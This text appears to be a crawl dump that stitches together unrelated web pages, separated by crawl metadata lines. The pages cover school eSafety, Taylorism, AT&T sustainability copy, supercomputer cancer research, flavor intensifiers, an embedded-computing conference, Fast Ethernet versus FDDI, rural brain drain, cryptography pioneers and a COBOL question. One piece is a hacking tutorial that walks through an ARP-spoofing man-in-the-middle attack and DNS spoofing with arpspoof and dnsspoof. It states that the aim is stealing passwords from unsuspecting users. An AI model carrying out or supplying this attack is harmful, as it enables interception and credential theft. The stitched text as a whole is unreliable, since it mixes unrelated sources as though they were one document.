To offer a sense of personal ownership and responsibility, IT staffs can provide access to certain apps and webpages to individuals or groups based on grade, ability, or maturity level. Students can earn their way into accessing more content on their device. Not all devices will be the same, and access can be based on digital citizenship level. This promotes higher levels of digital citizenship so that students can do more things on their iPad (like the things that their friends may have access to).
So when it comes to eSafety in schools there is a balance. And the best way to strike the right balance is to ensure student privacy and maintain an educational environment that’s flexible enough to promote good digital citizenship.
Over the last 239 years, organizations have been applying hierarchy and top-down, command-oriented management. This mindset erupted with the dawn of the steam engine in 1771, and in the late 1800s it was honed to razor sharpness by Frederick Winslow Taylor – the father of efficiency thinking and the science of productivity. Taylor’s work is credited with the productivity gains of the 20th century. But Taylor and his many disciples have exacted a huge toll on the role of humans in the workplace.
Taylor believed that an empirical, data-driven approach to the design of work would yield big productivity gains. His ideas are the foundation of current-day thinking about efficiency and methodologies like Six Sigma. Taylor believed that efficiency came from “knowing exactly what you want men to do, and then seeing that they do it in the best and cheapest way”. Solving the problem of inefficiency has been business’s mission for the last 239 years, and efficiency has been pursued ahead of every other goal.
As a result, humans have become cogs in business machinery pursuing efficiency. The mental image it inspires dominates organizational management and the way people work. It is a debilitating mental model that negatively influences how every executive, manager, and employee performs their role:
- There are two kinds of people in organizations, the machinery and people that control the machinery.
- Every cog has its role, and not another.
- Machines do not think, cogs do what they are told to do.
- Efficiency increases productivity – true for machines, but not so true for human endeavors.
Organizations have institutionalized the idea that we are machines awaiting instruction. It is hardly the model we would have chosen if we had the choice at the very beginning. Two hundred thirty-nine years of deterioration is much easier to accept because it is incremental. It is hardly noticeable until something happens that makes that model unpalatable.
The global economy, the work environment, and the world around us have changed.
There is a story about coffee producers in the 1960s who experienced the collapse of the coffee crop. One producer facing cost increases for the best beans decided that instead of raising ground coffee prices they would add a lesser grade bean to their coffee. Taste tests with their coffee drinkers indicated they could not perceive a difference between the best beans and the grind with lesser beans added. The efficiency of the idea caused the producer year after year to incrementally add more of the lesser bean and make more profit. Each year their coffee drinkers validated that they could not tell the difference.
New coffees entered the market using only the best beans. They asked people new to coffee drinking to compare their new brand to the incrementalist’s brand. These new coffee drinkers found that the taste of the incremental blend was so horribly different that people were asking “Why would I want to drink that bitter coffee over this new one?” The old coffee producer had incrementally destroyed the taste of their coffee and woke up to a crisis – the only people who liked their coffee were those who stayed with the brand through the incremental changes.
Businesses today are in the same state of crisis as the coffee producer of the 1960s. By incrementally adding Taylorism to business we have removed the human aspect of business and destroyed our blend. Today we awake to a new global economic condition, new social expectations, and full swing consumerization. The businesses we have honed into efficient cog-filled environments are poised to be changed by relationship-based economics. It is an economic paradigm that demands a human-centered approach to business-consumer relationships. The impersonal economic relationship is no longer desired. Organizations must become human to their customers.
But issues with the business-consumer relationship are just the tip of the crisis. What hides below the waterline changes the fundamentals upon which every efficiency-oriented organization thinks about managing people. The nature of work is fundamentally changing. It is returning to a human and naturally social environment.
I can only imagine that the current generation entering the workforce are the new coffee drinkers who cannot believe that work has become so mechanized, impersonal, and non-participative.
We have some serious work to do in order to return humans, their cognition, their curiosity, and their interactions back into the nature of work. Work has lost ‘context’ which determines meaning and gives us the autonomy to make a relevant contribution.
Consider a future where connected cars produce more efficient traffic patterns on crowded city streets and connected buildings are smart enough to reduce their own energy use. To meet growing environmental challenges in our cities, our businesses and our communities, we are creating technology that turns potential into reality.
From water pipes that detect their own leaks to sensors that warn us when perishable cargo is in danger of spoiling, our connected future is here – changing and improving our lives. This technology helps us preserve natural resources and prevent waste, avoid traffic jams and get places more efficiently, and keep our homes healthier and safer. Technology builds smart cities, smart communities and smart businesses that help us care for our planet.
We’re creating technology that empowers all of us – our 120 million wireless customers, large and small companies, big cities, little towns and more – to accomplish incredible things. Together we can tackle today’s issues to build a better tomorrow.
Looking for better battery life and a device made with environmentally preferable materials? How about a device manufactured in a place with a human rights policy? It’s time to look to the stars.
Don’t just throw your device away! When you’re ready to upgrade to the latest and greatest, help your old device find a new life. Recycle with Buyback.
Discover more through our Product Life Cycle issue brief.
5.9M gallons of unleaded gasoline avoided in 2015 through use of 11,257 Alternative Fuel Vehicles (AFVs).
We’re a large and growing company, so any change to our operations can have a big effect. That’s why we’re getting smarter about how we use energy, manage our carbon footprint, consume water, reduce waste and work with our suppliers. For example: from the Atlantic to the Pacific, you can find an AT&T alternative fuel vehicle in nearly every state of the union. But we can’t do it alone — we’re sharing what we learn through collaboration with groups such as Environmental Defense Fund so others can use and improve the tools we’ve developed. | <urn:uuid:69e0ebf4-6013-427b-a7aa-62e1fab3edab> | CC-MAIN-2017-04 | http://about.att.com/content/csr/home/planet.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281450.93/warc/CC-MAIN-20170116095121-00343-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.920009 | 431 | 2.5625 | 3 |
Hideaki Fujitani is a professor at Tokyo University’s Laboratory for Systems Biology and Medicine (LSBM). He has a supercomputer and aims to cure cancer with it — that according to a recent article in The Japan Times, in which Fujitani’s work is described.
According to the article, Fujitani spends most of his time running simulations of antibodies bonding, or attempting to bond, to antigens. For those of you who slept during biology class, antibodies are proteins the immune system uses to attach to antigens (foreign molecules); in this case Fujitani is studying antigens specific to cancer cells. The LSBM, led by Tatsuhiko Kodama, is focused on developing drugs for patients with recurring and advanced stages of cancer.
The simulations are aimed at making an antibody bond to and neutralize an antigen. There is one catch though, the simulation is of 30,000 to 40,000 atoms, made up of antigen, antibody and surrounding water. Also, the molecules move extremely fast, “A molecule moves in about 1 femtosecond, gradually changing the shape of proteins over microseconds,” says Fujitani, “To see the dynamics, you need to solve about one billion equations. If one CPU were able to solve one equation per second, it would still take 32 years to solve all the problems. That’s why we need the fastest supercomputer with lots of CPUs.”
Luckily for Fujitani the LSBM acquired a 612-core supercomputer in 2010 that can crack 34 teraflops. Just months after the super’s arrival, he was verifying his simulation results with an X-Ray of an actual antibody. As amazing as his work may seem, gaining support for computer-aided drug development was not so simple. He struggled to receive support from Fujitsu, his former employer, and the Japanese pharmaceutical industry, before taking his talents to the University of Tokyo.
Because of the nature of his practice, Fujitani can always use more computational power. Fortunately he will soon be getting that with a project that will tap into what is currently the fastest computer in the world, the 10-petaflop K computer. “The K will be 240 times faster than the machine here, so we can do the calculations much more quickly, and run different programs simultaneously,” he continued, “What takes a month to simulate here will be done in three or four days.”
Fujitani seems confident that he and the rest of Kodama’s team will be able to find a cure for cancer. He says that in the future even people with advanced stages of cancer will be able to be cured.
Developed by the Military University of Technology in Poland, a new laser device is designed to detect alcohol vapor in passing cars.
Researchers reported that the device can measure blood-alcohol levels from a distance of about 65 feet. The device works using a process known as standoff detection, in which the laser is bounced off a mirror on the opposite side of the road; if the beam is at all absorbed by alcohol vapor, the difference is detected and the driver is busted.
The device has not yet been used on the roads or with moving vehicles, but was sensitive enough in lab trials to detect a blood-alcohol level of 0.1 percent. (.08 is the legal limit for driving in most states.) | <urn:uuid:56cb677e-c52d-450a-a8ac-f18397aefe2e> | CC-MAIN-2017-04 | http://www.govtech.com/question-of-the-day/Question-of-the-Day-for-070814.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283008.19/warc/CC-MAIN-20170116095123-00251-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.967583 | 145 | 3.109375 | 3 |
Frost & Sullivan Market Insight | Published: 22 Mar 2002
by Ivan Fernandez
The remedy lies in flavor intensifiers - a group of ingredients that are increasingly being used to solve precisely this problem in the food industry today.
Flavor intensifiers help enhance the flavor of foods without the necessity of adding more of the actual base flavor. They do this in several ways: by sharpening the attributes of the base flavor, complementing the base flavor so as to accentuate the desired note, enhancing, smoothening, or rounding off specific notes in the flavor, minimizing undesirable aftertastes, or even extending the duration of flavor perception on the tongue. The most common flavor intensifiers are sodium chloride (salt), monosodium glutamate (MSG), nucleotides, and soy sauce.
Sodium Chloride: Its role does not end with its saltiness. It works as an effective flavor intensifier by enhancing the perception of flavors in foods. However, any use of sodium chloride as a flavor intensifier should take into account the sodium content of other ingredients in the food, the final form of the product, the maintenance of a safety threshold of total sodium content in the food (especially with regard to sodium-restricted diets), and taste preferences that vary across cultures.
MSG: The sodium salt of glutamic acid, MSG is produced by fermenting starch, sugar beet, or sugarcane. In 1908, Dr. Kikunae Ikeda identified glutamic acid as the flavor source of the traditional Japanese kelp, used in Japanese cuisine for centuries. His discovery was commercially marketed in the following year as the flavor intensifier Ajinomoto - Japanese for ‘the essence of taste’. Today, the Ajinomoto brand is synonymous with MSG, and despite negative publicity over health risks and reported adverse reactions, the brand is sold in over a hundred countries, and is the most preferred flavor intensifier currently in use. Apart from its ubiquitous role in Asian cuisine, MSG is used to intensify flavor in processed meat, canned fish, soups, salad dressings, frozen entrees, ice cream, and yogurt. Temperature as well as pH levels of foods impact the efficacy of MSG. In most cases, labeling does not accurately indicate the amount of MSG in food products, since much of it is included as part of other ingredients such as potassium glutamate, hydrolyzed vegetable protein (HVP), hydrolyzed plant protein (HPP), autolyzed yeast, and sodium and calcium caseinate.
Nucleotides: Organic compounds such as disodium inosinate (IMP) and disodium guanylate (GMP) have been used either as replacements for MSG, or to complement MSG in enhancing flavors. These compounds, called nucleotides, are most commonly used to intensify flavors in sauces, gravies, soups, meats, vegetables, flavored rice, noodles, stuffing mixes, and snacks. The most successful instance of commercialization of nucleotides has been Ribotide, introduced by Takeda in 1961. To enhance flavor five times over, Takeda’s general recommendation is a combination of 5 percent Ribotide and 95 percent MSG.
Soy Sauce: Brewed from soybean, wheat, and salt, soy sauce is normally associated with Asian cuisine. However, it is capable of adding depth and enhancing the flavor of a much wider variety of foods, such as meat, pies, hamburgers, vegetables, soups, sauces, stews, gravies, dressings, dips, barbecues, and snacks. In fact, soy sauce is increasingly being used to enhance the cocoa flavor in chocolate. Globally, the largest soy sauce manufacturer is Kikkoman, a company that prides itself on a rich heritage of soy sauce brewing that can be traced back three centuries. Despite growing recognition of the beneficial properties of soy, soy sauce has been tainted by a few health concerns, with certain studies claiming that some soy sauce products contain carcinogenic substances at unsafe levels.
High Growth Areas
Apart from the primary objective of improving the palatability of foods and beverages for the mass market, flavor intensifiers can also lend themselves to special applications with potential for high growth:
Dieting That Works: For obese consumers who have tried unsuccessfully to reduce weight by following strict dieting regimes - which meant bland and insipid food - flavor intensifiers are truly a dream come true. By inducing a sense of fullness through enhancing flavors in foods, flavor intensifiers can help dieters eat less without feeling deprived.
Spicing Up Old Age: Flavor intensifiers can also help prevent malnutrition in aged people who lose their appetite because of their diminished ability to taste and smell, on account of aging, declining health, medication, or surgery. The presence of these intensifiers significantly enriches the eating experience for the aged without the danger of health risks through over-indulgence in seasonings or sweeteners.
A Pet’s Best Friend: Flavor intensifiers also play a significant role in the pet food industry by increasing the palatability of therapeutic diets such as low fat, low-sodium, and low-protein meals for dogs and cats.
As the growing market for Asian foods is driven by greater demographic diversity and the more adventuresome spirit of consumers in the EU, North America, and Australia, flavor intensifiers that deliver bolder flavors will enjoy increased demand. These ingredients have also stepped way beyond the boundaries of Asian cuisine. Even as these changes present lucrative opportunities for the industry, there is also the challenge of health concerns, accentuated by the consumer’s heightened priority for food safety. Success is likely to go to those companies who consistently deliver that desired savory note while ensuring safety at all costs.
Welcome back, my fellow hackers! There have been some articles I’ve been wanting to write regarding social engineering, more specifically, stealing passwords. But, in order to do that, there are some basic concepts and methods we need to have a grasp of. The first of these concepts is Man in the Middle Attacks. Since we’ve already covered that, we’re going to cover the next concept, DNS spoofing. First, we’ll cover what DNS is exactly, then we’ll quickly discuss the anatomy of the DNS spoofing attack, and finally, we’ll perform the attack! So, let’s get started!
What is DNS?
This question is actually fairly simple. DNS stands for Domain Name System. You know when you go to a website using a browser, you type in a URL instead of the IP address of the server? That’s DNS working its magic! What DNS does is keep track of which IP addresses reside at which URLs, so that we don’t have to remember the addresses, just the URLs! Pretty neat, huh? Like I said, DNS is fairly simple, so let’s move on to the next part, the anatomy of a DNS spoofing attack.
Anatomy of a DNS Spoofing Attack
Since this can be a bit difficult to talk about without a reference, we’re going to be dissecting this attack based on this diagram:
As we can see here, the attacker starts by pretending to be the DNS server. Then, when the victim requests the address for the desired site, the fake server responds with whatever address the attacker wants, which in this case, directs the victim to a fake site. This attack is very simple, but can often play a part in a larger attack. Now that we know the ins and outs of DNS spoofing, let’s perform it ourselves!
Performing a DNS Spoofing Attack
Setting up the Attack
Before we really get started, there are a couple of things that we need to prepare. Namely, we need to prepare the fake website, and set up the configuration file for the DNS spoofing tool.
Let’s start by setting up the website. First, we’ll whip up some basic HTML code so we actually have a site. We’ll be using gedit. The proper file can be opened with the following command:
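On a stock Kali setup with Apache, something along these lines should open the right file (the path is an assumption; older installs keep the default page at /var/www/index.html instead):

    # open Apache's default page for editing (web root path assumed)
    gedit /var/www/html/index.html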
Now that we have our file open, just go ahead and erase everything in it. I’ll be replacing it with the following:
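Any minimal page will do; the wording below is only a placeholder:

    <html>
      <body>
        <h1>You are now on our page!</h1>
        <p>Replace this text with whatever you like.</p>
      </body>
    </html>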
Feel free to replace the words with whatever you like, as long as you follow the HTML tags, everything should be fine.
Now that we have our website’s HTML code ready, we can go ahead and start the server that will serve the website. We’ll just be using the pre-installed Apache2 webserver, which can be started with the following command:
Now that we have the site up and running, we need to quickly edit the configuration file for the DNS spoofing tool. We’re just going to be modifying the /etc/hosts file and using it for our attack. We can open the file with the same command we used previously, but with the new file path. Once we have the file open, we can set up the file to tell the spoofing tool what sites we want to spoof. Before we do that, we need to know our local IP address, which we can find with the ifconfig command:
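For example:

    ifconfig
    # note the inet (IPv4) address of the interface you are using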
We can see that our local IP address is 10.0.0.16. Now that we know it, we can edit the file. We’re just going to be adding this line:
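In hosts-file format, that is simply our address followed by the hostname, appended at the bottom of /etc/hosts:

    10.0.0.16    www.hackingloops.com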
The line we added (the bottom one), will tell the spoofing tool that we want www.hackingloops.com to be redirected to our local IP address, which will then serve them our website instead of the real one! That’s it for the setting up, now it’s time to execute the attack!
Executing the Attack
Now, if we’re going to be redirecting traffic that isn’t ours, we need to be able to read it. This is where the Man in the Middle Attack comes into play. We’re going to place ourselves between the victim and the gateway, so that all of the victim’s DNS requests have to go through us. We can then sniff these requests and redirect them with our spoofed responses! To start, we need to know the gateway’s IP address, which we can find with the route command with the -n flag:
We can see by the above output that the address of the gateway is 10.0.0.1. For the sake of keeping this relatively short, we already have our victim’s address, which is 10.0.0.13. Note that all these addresses are on the same network. This form of DNS spoofing only works if the victim is on your LAN. Now that we have the addresses, we can start the Man in the Middle attack (finally)! We’re going to be using arpspoof for this attack, and we’ll be using the -i, -t, and -r flags to specify the interface to attack on and the addresses to attack:
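With the example addresses above, the command would look roughly like this (eth0 is an assumed interface name; substitute your own):

    arpspoof -i eth0 -t 10.0.0.13 -r 10.0.0.1
    # -i interface, -t the victim; -r poisons both directions between the victim and the gateway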
Once we execute this, the MitM will start.
DO NOT FORGET: You must enable IP forwarding, so the data from the victim doesn’t get hung up on the attacking system. This can be done with this command: echo 1 > /proc/sys/net/ipv4/ip_forward
Now that we have our MitM running, we should have all the victim’s traffic flowing through the attacker system. Since we can see all this traffic, we can start the DNS spoofing tool (dnsspoof) to listen for DNS requests for www.hackingloops.com and respond to them with our IP address! Let’s go ahead and start dnsspoof now. We use the -i flag for giving an interface, and the -f flag for giving the path to the hosts file. The command to start the attack should look something like this:
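Using the same assumed interface as before:

    dnsspoof -i eth0 -f /etc/hosts
    # -i interface to sniff on, -f the hosts file we edited earlier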
We can see that dnsspoof is now listening for UDP traffic on port 53 (port 53 is the DNS port, and UDP is the transport protocol DNS uses) from all address but our own! Now that our attack is up and running, let’s move over to our victim PC and try and access www.hackingloops.com from a web browser:
Now, before we celebrate, let’s look back at dnsspoof to see the output:
There we have it! We were able to start a Man in the Middle attack, and use it to perform a DNS spoofing attack, which redirected a legitimate request for www.hackingloops.com to our fake website!
There are multiple reasons for this article. For one, we’ll be needing these attacks very soon in order to steal passwords from an unsuspecting user. Secondly, it’s a proof of concept of sorts. It shows that these smaller attacks (MitM, DNS spoofing, etc.) aren’t just one-trick ponies. We can combine these attacks to achieve even greater things. Many times, when performing an actual hack, you will need to combine many different kinds of attacks at once to achieve a goal; this just proves that. I’ll see you next time!
High-performance computing (HPC) isn’t restricted to computer rooms. It is also found “embedded” within expensive gadgets. For example, it is at your local hospital inside the CAT and MR scanners. It is inspecting new semiconductors. It is inside defense RADAR and signals intelligence platforms. In fact, the market for embedded HPC is thought to be about the same size as the market for supercomputers.
Will cloud computing impact these embedded applications? Evidence exists that clouds are indeed having an impact on applications that involve sensors or local data. This is documented in VDC Research’s survey of commercial, industrial, and defense applications titled “Scalable Edge Nodes: Cloud Services for Embedded Applications”. VDC’s results were previewed at last week’s High Performance Embedded Computing (HPEC) workshop. VDC predicted the emergence of a tiered cloud where some computing is located near the data (instead of moving all data to distant servers).
The theme of last week’s HPEC workshop was: “custom clouds and GPU chips: their impact on DoD applications”.
As the workshop progressed multiple definitions of the word “cloud” emerged. Several speakers described “cloud” as enabling pattern matching within large databases. At the opposite extreme, speakers called big microprocessors “clouds”. Finally the closing panel jumped off the technical tracks and defined “cloud” as a new business model.
One cloud application not discussed at HPEC was “utility computing” which is this community’s name for services like Amazon’s EC2 which share servers among users. Sharing is difficult when classified data is involved.
Speakers using the pattern matching definition noted that clouds are what Google and Facebook use to mine their own websites for patterns that attract advertisers. Of course the government’s interest is different: searching through things like email and telephone intercepts and then automatically pointing analysts at potential terrorists. Multiple HPEC presentations used this very example while describing the underlying middleware and database. On the hardware side, HPEC’s “data intensive” platform talks ranged from an introduction to a new supercomputer at SDSC to a description of a custom 3D-Graph microprocessor from Lincoln Labs.
Yes, marketers are now labeling single chips as clouds. Intel may have started this trend back in December when it announced a 48 core research chip as a “single chip cloud computer”. Now it seems every chip with many cores or many threads calls itself a cloud. At HPEC we saw that spin from Tilera and others.
The workshop ended with a panel of experts answering audience questions relating to the conference theme. This year Raytheon’s Niraj Srivastava responded to the very first question by describing clouds as a new kind of outsourcing. He used DISA’s RACE procurement won by HP as an example. The panel’s conversation never returned to the technical domain. Instead panel members explored service level agreements and similar concepts driving the enterprise world.
The complete HPEC theme included a focus on GPU computing as the this community is open to deploying accelerators. Many HPEC papers described science projects using GPU chips. The general impression was that GPUs speed up some algorithms but overall performance suffers from the overhead of copying data both into and out of the GPU. Multiple speakers also complained that fast GPU code is not portable. Finally, compute-enabled GPU chips consume lots of power and thus become difficult “point heat sources” within embedded systems. Nevertheless, speakers mentioned that at least two embedded vendors, Mercury Computer and GE Intelligent Platforms, have added GPU acceleration into their air-cooled product lines.
HPEC stands for High Performance Embedded Computing. The HPEC workshop is in its 14th year and always held at MIT Lincoln Laboratory near Boston. The two day event attracts roughly 200 people and is probably best known as the venue where DARPA traditionally announces new high performance computing programs. However, no programs were announced this year although the keynote speaker was outgoing DARPA TCTO office director Dr. Peter Lee. Instead Lee described the recent merger of TCTO with IPTO into a new office named I2O. He hinted that researchers should expect new programs in about six months, probably focused on exploitation and cyber security. Lee is departing DARPA to become the Managing Director of Microsoft Research Redmond.
Do the VDC survey results feel correct after listening to the entire conference? No speaker talked about a tiered cloud. No speaker debated the wisdom of moving data far away for analysis. These topics were left open, probably considered implementation details. The focus at HPEC was higher level — what new capabilities can cloud technology bring that are not currently available to analysts and “warfighters”? Who will make research dollars available to make it happen? It appears those dollars are flowing and future HPEC conferences will continue to explore the intersection of clouds with embedded applications.
The HPEC workshop’s website is http://www.ll.mit.edu/hpec. Slides used by workshop speakers will eventually appear on this site. Slides from past workshops are already there. The next HPEC is September 20-22, 2011.
About the Author
Craig Lund has a long record of successfully driving high-performance computing into profitable niche markets. That happened at Mercury Computer where he was CTO and helped pioneer adoption within medical imaging, inspection, and defense. Before Mercury, Craig led successful HPC business thrusts into large-scale decision support and real-time control.
Craig is currently consulting for a collection of defense primes, HPC vendors, and semiconductor firms. He also writes for HPC in the Cloud. You can reach him using clund ATSIGN localk DOTcom | <urn:uuid:7f073d1d-3fa7-4ae6-b289-bdc85b046c33> | CC-MAIN-2017-04 | https://www.hpcwire.com/2010/09/22/embedded_clouds_a_look_back_at_hpec_2010/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00095-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.949005 | 1,208 | 2.5625 | 3 |
Fast Ethernet (100Base-T) is an extension of IEEE 802.3 CSMA/CD. Its LAN has a star topology connection for up to 210 meters in diameter using either UTP or fiber cable. Fast Ethernet uses the same MAC layer as 10Base-T Ethernet, so Ethernet users can easily migrate to Fast Ethernet. Applications and higher-level protocols developed on 10Base-T Ethernet will run on 100Base-T Fast Ethernet without modification, and 100Base-T adaptors are available to switch between the widely used 10 Mbps Ethernet and the 100 Mbps standard. In addition to having the advantages of Ethernet, Fast Ethernet has a 100 Mbps throughput that makes it competitive with FDDI networks. The limit for an Ethernet is 2500m and 1024 hosts, with no more than 4 repeaters between each host pair. The maximum segment length for Fast Ethernet is only 100m, or up to 2000m with a fiber optic link.
FDDI (Fiber Distributed Data Interface) is a 100 Mega-bit technology using a timed token over a dual ring of trees. An FDDI network consists of two independent rings that transmit data in opposite directions, so that it is able to tolerate a single break in the cable. Each host implements a small elasticity buffer that temporarily holds the bits of a frame as they pass through the host, so that frames are able to be sent over the ring without all the hosts having to be synchronized. FDDI also allows SAS (single attachment stations) in the configuration of the ring. These improvements give FDDI a 100 Mbps throughput. The limit for an FDDI ring is 100km and 1000 hosts. FDDI can transmit a frame of up to 4500 bytes, which is about three times as much as Ethernet can.
Are FDDI networks in danger of dying away?
Let’s compare the two technologies in terms of throughput, latency, determinism, configuration, maintenance, compatibility, reliability, cost, user community, and interconnectivity.
- throughput – On shared media LANs such as Fast Ethernet and FDDI, line speed decreases in proportion to the number of nodes contending for a portion of the total available bandwidth. Now assume the same number of hosts on each LAN: even though Fast Ethernet and FDDI have the same 100 Mbps throughput, FDDI will run faster than Fast Ethernet because Ethernet’s collision detection could reduce its usable bandwidth by 30-50%.
- latency – FDDI has much higher latency, since data frames have to be passed by many hosts in between. For Ethernet, the latency is relatively lower, although it is nondeterministic because of the random wait after a detected collision.
- deterministic – FDDI is deterministic. But Ethernet is not, because of the wait for a random time after detecting a collision.
- configuration and maintenance – It is less complicated with an Ethernet LAN because of its simple structure. Adding one more host on Ethernet is much simpler than doing it on FDDI. The Ethernet protocol is simple, and hosts can be installed on the fly without taking the whole network down.
- distance – With 100m for twisted pair and 2000m for fiber optics on a Fast Ethernet segment, FDDI is clearly the better choice, with a distance of up to 100km.
- host load – Both Fast Ethernet and FDDI can accept up to about 1000 hosts. For FDDI, more hosts mean potentially longer latency. For Fast Ethernet, more hosts mean more collisions and more congestion. Even worse, at loads higher than 60%, the overall throughput of Ethernet can stall, because hosts will be busy detecting collisions and waiting, and thus are not able to transmit.
- compatibility – Ethernet users can easily migrate to Fast Ethernet. Applications and higher-level protocols developed on 10Base-T Ethernet will run on 100Base-T Fast Ethernet without modification, and 100Base-T adaptors are available to switch between the widely used 10 Mbps Ethernet and the 100 Mbps standard.
- reliability – Ethernet is simple, has fewer things to break, and thus is pretty reliable. For FDDI, the whole LAN could be brought down if one or more hosts in the ring break. The dual ring is only able to tolerate a single break in the cable.
- cost – Although Fast Ethernet does not have a technical edge over FDDI in terms of speed, it is much easier to configure and maintain than FDDI. In addition, Fast Ethernet products cost a fraction of what their FDDI counterparts do.
- users – Ethernet has more users. One of the most important obstacles to the installation of high-performance networks is users’ failure to accept the new technology. In the case of Ethernet, a large community of users was convinced to install a commonly agreed type of high-performance network because manufacturers are able to provide standard add-on features which, as they are produced in bulk, can be offered more cheaply.
- interconnectivity – When FDDI and Fast Ethernet are bridged, only 50 Mbps can be handled before heavy packet loss appears in the client-server experiment. In contrast, Ethernet switches deliver dedicated bandwidth.
FDDI is more efficient with its high bandwidth at the 100 Mbps level, but Fast Ethernet is better for latency-sensitive applications. Fast Ethernet is more cost-effective and already has a larger user community. So we believe that Fast Ethernet is the winning technology over FDDI.
Photo: Driving across America's heartland.
According to Saint Joseph's University sociologist Maria Kefalas, Ph.D., the greatest export of America's heartland is no longer corn and wheat, but rather its young and talented people.
With one out of every five Americans still living in non-metropolitan areas, and considering that those areas now face natural decline with more deaths than births, the problem of the youth exodus from rural America is one that simply cannot be ignored.
"The nation's food supply is undeniably linked to the region, as is the election of its presidents," says Kefalas. "Not to mention that rural America sends more of its young men and women to the military than any other region."
Kefalas is the co-author of a newly released book, Hollowing out the Middle: The Rural Brain Drain and What it Means for America published by Beacon Press, the research for which was funded by the MacArthur Foundation's Transitions to Adulthood study in 2001. Kefalas and her co-author Patrick Carr, Ph.D., traveled to "Ellis," Iowa (Ellis is a pseudonym), where they conducted interviews with young people five and 10 years out of college, as well as with local school, business and government personnel.
What they found was that, surprisingly, small towns are contributing to their own demise by encouraging the most talented and creative of their young people to leave the nest and pursue lives outside of their rural hometowns. The result is an emptying out that places these small towns in danger of extinction.
"Small towns are short-circuiting the educational and economic opportunities for their young people by not investing in those who are likely to stay and return," Kefalas maintains. "By matching the non-college-bound with vocational education and access to better job training, they will be better prepared to give back to their own communities."
Photo by Paul and Christa. CC Attribution-Noncommercial 2.0 Generic | <urn:uuid:a729bba1-7f6d-45c5-8edb-57f3569e707c> | CC-MAIN-2017-04 | http://www.govtech.com/policy-management/Americas-Heartland-and-the-Rural-Brain.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280504.74/warc/CC-MAIN-20170116095120-00307-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.973165 | 412 | 2.671875 | 3 |
R is a functional programming environment for business analysts and data scientists. It's a language that many non-programmers can easily work with, naturally extending a skill set that is common to high-end Excel users. It's the perfect tool for when the analyst has a statistical, numerical, or probabilities-based problem based on real data and they've pushed Excel past its limits.
In this course, you will explore common scenarios that are encountered in analysis, and present practical solutions to those challenges. Throughout the course, special attention is paid to data science theory including AI grouping theory. A discussion of using R with AI libraries like Madlib is also included.
Experience expert-led online training from the convenience of your home, office or anywhere with an Internet connection.
Train your entire team in a private, coordinated professional development session at the location of your choice.
Receive private training for teams online and in-person.
Request a date or location for this course. | <urn:uuid:30d08e09-1729-4ba2-9f56-e6ad021e5ce0> | CC-MAIN-2017-04 | https://www.globalknowledge.com/ca-en/course/134415/mastering-r-for-data-scientists-ttc01s5-r/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281659.81/warc/CC-MAIN-20170116095121-00031-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.942224 | 197 | 2.9375 | 3 |
"The field of theoretical cryptography has blossomed in a way that I didn't anticipate in the early days," said Ron Rivest, a professor of electrical engineering and computer science at MIT and, along with Shamir and Len Adelman, one of the inventors of the RSA public-key cryptosystem. "It's related to so many other fields, information theory and others. It's much broader and richer than I imagined it would be."
In April 1977, Rivest, Shamir and Adleman published a paper called "A Method for Obtaining Digital Signatures and Public-Key Cryptosystems," which described a practical method for encrypting a message using a publicly shared key.
The paper picked up on the work done a year earlier by Diffie and Hellman, who had invented the concept of public-key cryptography. Until then, no one had been able to work out a practical way to transmit a decryption key to the recipient of a message. Diffie and Hellman's innovation was brilliant in its simplicity: encode the message with a shared public key and decrypt it with a private key.
The RSA paper was the beginning of digital encryption and eventually led to its wide use on the Web and in commercial software. But Hellman, an former engineering and math professor at Stanford University, said he was surprised that cryptography hadn't advanced more in the last 30 years.
"I thought there would be provably secure systems, and 30 years later, we don't have them," he said. "I thought there would be more cryptosystems as well."
But even as they noted the lack of progress in some areas, the panelists emphasized that cryptanalysis has advanced greatly and Shamir said that he expects some significant progress in the coming year on a couple of fronts. He mentioned that there are a number of serious attempts to implement an attack on the SHA-1 hash algorithm.
"I think we'll see success on that in the next few months," Shamir said. He also pointed out that cryptosystems' unfortunate tendency to fail badly when any small change is made to them, makes them somewhat difficult to implement and work with.
"The main problem with cryptography is that it's highly discontinuous. If you have a
cryptosystem and make any slight change, it can lead to devastating attacks," Shamir said. "We didn't think enough at the time about how to recover from these attacks."
Diffie, CSO at Sun Microsystems and a Sun fellow, said the initial zeal that he and the other pioneers of digital cryptography felt led to a mistaken belief that their discoveries would make data completely secure.
"I think cryptography will always just be one of the pieces," Diffie said. "The worst you can say is that public-key cryptography has been a great success." | <urn:uuid:a49146f6-0c91-4c90-9321-dcc50b526f1e> | CC-MAIN-2017-04 | http://www.computerweekly.com/news/1280096243/Cryptographers-Panel-Forefathers-still-eager-for-new-advances | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281331.15/warc/CC-MAIN-20170116095121-00389-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.979872 | 610 | 3.078125 | 3 |
Why is it necessary to use all the divisions in COBOL?
Is there any rule or standard for a COBOL program?
Actually, I can't understand the concept behind the divisions: why should all the divisions be included in a COBOL program while writing it?
At the top of the page where you are reading this, there is a "Manuals" link. Click on that link and the first 6 manuals linked are for current versions of COBOL. Click on the Language Reference or the Programming Guide for the version of COBOL your system uses.
Information about divisions will be very similar in all 3 sets.
If you find something that is not clear, post it here with your question about what is not clear to you. | <urn:uuid:25e8657f-b3b4-4934-abb8-5dbde221c7bf> | CC-MAIN-2017-04 | http://ibmmainframes.com/about23994.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00141-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.903067 | 165 | 3.03125 | 3 |
Originally published December 28, 2012
